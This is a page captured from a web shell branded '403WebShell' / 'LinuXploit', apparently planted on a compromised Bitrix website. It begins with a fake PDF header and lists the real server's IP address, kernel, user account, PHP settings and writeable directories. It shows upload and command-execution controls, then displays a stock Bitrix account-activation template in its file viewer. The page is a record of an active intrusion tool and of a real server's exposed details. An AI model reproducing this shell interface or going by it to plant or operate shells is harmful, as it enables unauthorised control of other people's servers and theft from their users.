%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 18.224.68.177
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/system.auth.initialize/templates/.default/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/system.auth.initialize/templates/.default/template.php
<?if(!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED!==true)die();?>

<p><?
ShowMessage($arResult["MESSAGE_TEXT"])
?></p>
<?if($arResult["SHOW_FORM"]):?>
	<form method="post" action="<?echo $arResult["FORM_ACTION"]?>" enctype="multipart/form-data">
	<?=bitrix_sessid_post()?>
		<table class="data-table bx-confirm-table">
			<tr>
				<td>
					<span class="starrequired">*</span><?echo GetMessage("CT_MAIN_REG_INIT_NAME_TITLE")?>:
				</td>
				<td>
					<input type="text" name="NAME" maxlength="50" value="<?echo $arResult["USER"]["NAME"]?>" size="17" />
				</td>
			</tr>
			<tr>
				<td>
					<span class="starrequired">*</span><?echo GetMessage("CT_MAIN_REG_INIT_LAST_NAME_TITLE")?>:
				</td>
				<td>
					<input type="text" name="LAST_NAME" maxlength="50" value="<?echo $arResult["USER"]["LAST_NAME"]?>" size="17" />
				</td>
			</tr>
			<tr>
				<td>
					<?echo GetMessage("CT_MAIN_REG_INIT_WORK_COMPANY_TITLE")?>:
				</td>
				<td>
					<input type="text" name="WORK_COMPANY" maxlength="50" value="<?echo $arResult["USER"]["WORK_COMPANY"]?>" size="17" />
				</td>
			</tr>
			<tr>
				<td>
					<?echo GetMessage("CT_MAIN_REG_INIT_WORK_PHONE_TITLE")?>:
				</td>
				<td>
					<input type="text" name="WORK_PHONE" maxlength="50" value="<?echo $arResult["USER"]["WORK_PHONE"]?>" size="17" />
				</td>
			</tr>
			<tr>
				<td>
					<?echo GetMessage("CT_MAIN_REG_INIT_PERSONAL_PHOTO_TITLE")?>:
				</td>
				<td>
					<input type="file" name="PERSONAL_PHOTO" size="10">
				</td>
			</tr>
			<tr>
				<td colspan="2"><hr></td>
			</tr>
			<tr>
				<td>
					<?echo GetMessage("CT_MAIN_REG_INIT_LOGIN_TITLE")?>:
				</td>
				<td>
					<?echo $arResult["USER"]["LOGIN"]?>
				</td>
			</tr>
			<tr>
				<td>
					<div style="display: none;"><input type="text" name="LOGIN_PSEUDO" value="<?echo $arResult["USER"]["LOGIN"]?>" size="1" readonly /></div>
					<span class="starrequired">*</span><?echo GetMessage("CT_MAIN_REG_INIT_PASSWORD_TITLE")?>:
				</td>
				<td>
					<input type="password" name="PASSWORD" maxlength="50" value="<?echo $arResult["PASSWORD"]?>" size="12" />
				</td>
			</tr>
			<tr>
				<td>
					<span class="starrequired">*</span><?echo GetMessage("CT_MAIN_REG_INIT_CONFIRM_PASSWORD_TITLE")?>:
				</td>
				<td>
					<input type="password" name="CONFIRM_PASSWORD" maxlength="50" value="<?echo $arResult["CONFIRM_PASSWORD"]?>" size="12" />
				</td>
			</tr>
			<?
			if (trim($arResult["CHECKWORD"]) == '')
			{
				?>
				<tr>
					<td>
						<span class="starrequired">*</span><?echo GetMessage("CT_MAIN_REG_INIT_CHECKWORD_TITLE")?>:
					</td>
					<td>
						<input type="text" name="CHECKWORD" maxlength="50" value="<?echo $arResult["CHECKWORD"]?>" size="17" />
					</td>
				</tr>
			<?
			}
			else
			{
				?><input type="hidden" name="CHECKWORD" value="<?echo $arResult["CHECKWORD"]?>" /><?
			}
			?>
			<?
			if ($_REQUEST["USER_REMEMBER"] == "Y")
				$checked = " checked";
			else
				$checked = "";
			?>
			<tr>
				<td colspan="2"><input type="checkbox" id="USER_REMEMBER" name="USER_REMEMBER" value="Y"<?=$checked?>/><label for="USER_REMEMBER">&nbsp;<?=GetMessage("CT_MAIN_REG_INIT_REMEMBER_TITLE")?></label></td>
			</tr>

			<tr>
				<td colspan="2"><hr></td>
			</tr>
			<tr>
				<td colspan="2"><span class="starrequired">*</span><?=GetMessage("CT_MAIN_REG_INIT_REQUIRED_COMMENT")?></td>
			</tr>
			<tr>
				<td colspan="2"><?=GetMessage("CT_MAIN_REG_INIT_FUTURE_COMMENT")?></td>
			</tr>
			<tr>
				<td colspan="2"><input type="submit" name="confirm" value="<?echo GetMessage("CT_MAIN_REG_INIT_CONFIRM")?>" /></td>
			</tr>
		</table>
		<input type="hidden" name="<?echo $arParams["USER_ID"]?>" value="<?echo $arResult["USER_ID"]?>" />
	</form>
<?elseif(!$USER->IsAuthorized()):
	echo str_replace("#LINK#", $arParams["AUTH_URL"], GetMessage("CT_MAIN_REG_INIT_AUTH_LINK")).". ";
endif?>

Youez - 2016 - github.com/yon3zu
LinuXploit